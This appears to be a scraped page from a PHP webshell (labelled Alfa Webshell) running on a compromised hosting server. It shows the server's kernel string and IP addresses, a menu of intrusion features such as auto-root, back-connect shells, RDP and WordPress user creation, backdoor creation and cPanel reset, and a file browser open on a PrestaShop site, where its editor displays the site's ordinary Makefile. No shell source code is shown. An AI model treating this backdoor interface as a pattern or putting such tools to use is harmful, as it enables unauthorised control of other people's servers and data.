Linux node5458.myfcloud.com 6.10.2-x86_64-linode165 #1 SMP PREEMPT_DYNAMIC Tue Jul 30 15:03:21 EDT 2024 x86_64
Apache
: 45.79.123.194 | : 18.216.176.63
16 Domain
7.4.33
addify5
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
addify5 /
public_html /
prestashopdemo1 /
b2b-ps8 /
[ HOME SHELL ]
Name
Size
Permission
Action
admin109j7gltexbu14xvqtq
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxr-xr-x
cache
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
controllers
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
download
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
installold
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
localization
[ DIR ]
drwxr-xr-x
mails
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
override
[ DIR ]
drwxr-xr-x
pdf
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
themes
[ DIR ]
drwxr-xr-x
tools
[ DIR ]
drwxr-xr-x
translations
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxr-xr-x
var
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
webservice
[ DIR ]
drwxr-xr-x
.htaccess
420
B
-rw-r--r--
.php-cs-fixer.dist.php
1.5
KB
-rw-r--r--
INSTALL.txt
4.94
KB
-rw-r--r--
Install_PrestaShop.html
522
B
-rw-r--r--
LICENSES
855.71
KB
-rw-r--r--
Makefile
863
B
-rw-r--r--
XMLFeed.cache
534
B
-rw-r--r--
autoload.php
1.27
KB
-rw-r--r--
composer.lock
493.25
KB
-rw-r--r--
error500.html
2.45
KB
-rw-r--r--
error_log
53.77
KB
-rw-r--r--
index.php
1.43
KB
-rw-r--r--
init.php
1.23
KB
-rw-r--r--
phpstan.neon.dist
2.58
KB
-rw-r--r--
robots.txt
3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
install: composer assets composer: composer install ./bin/console cache:clear --no-warmup assets: ./tools/assets/build.sh front-core: ./tools/assets/build.sh front-core front-classic: ./tools/assets/build.sh front-classic admin-default: ./tools/assets/build.sh admin-default admin-new-theme: ./tools/assets/build.sh admin-new-theme admin: admin-default admin-new-theme front: front-core front-classic cs-fixer: ./vendor/bin/php-cs-fixer fix phpstan: ./vendor/bin/phpstan analyse -c phpstan.neon.dist scss-fixer: cd admin-dev/themes/new-theme && npm run scss-fix cd admin-dev/themes/default && npm run scss-fix cd themes/classic/_dev && npm run scss-fix es-linter: cd admin-dev/themes/new-theme && npm run lint-fix cd admin-dev/themes/default && npm run lint-fix cd themes/classic/_dev && npm run lint-fix cd themes && npm run lint-fix
Close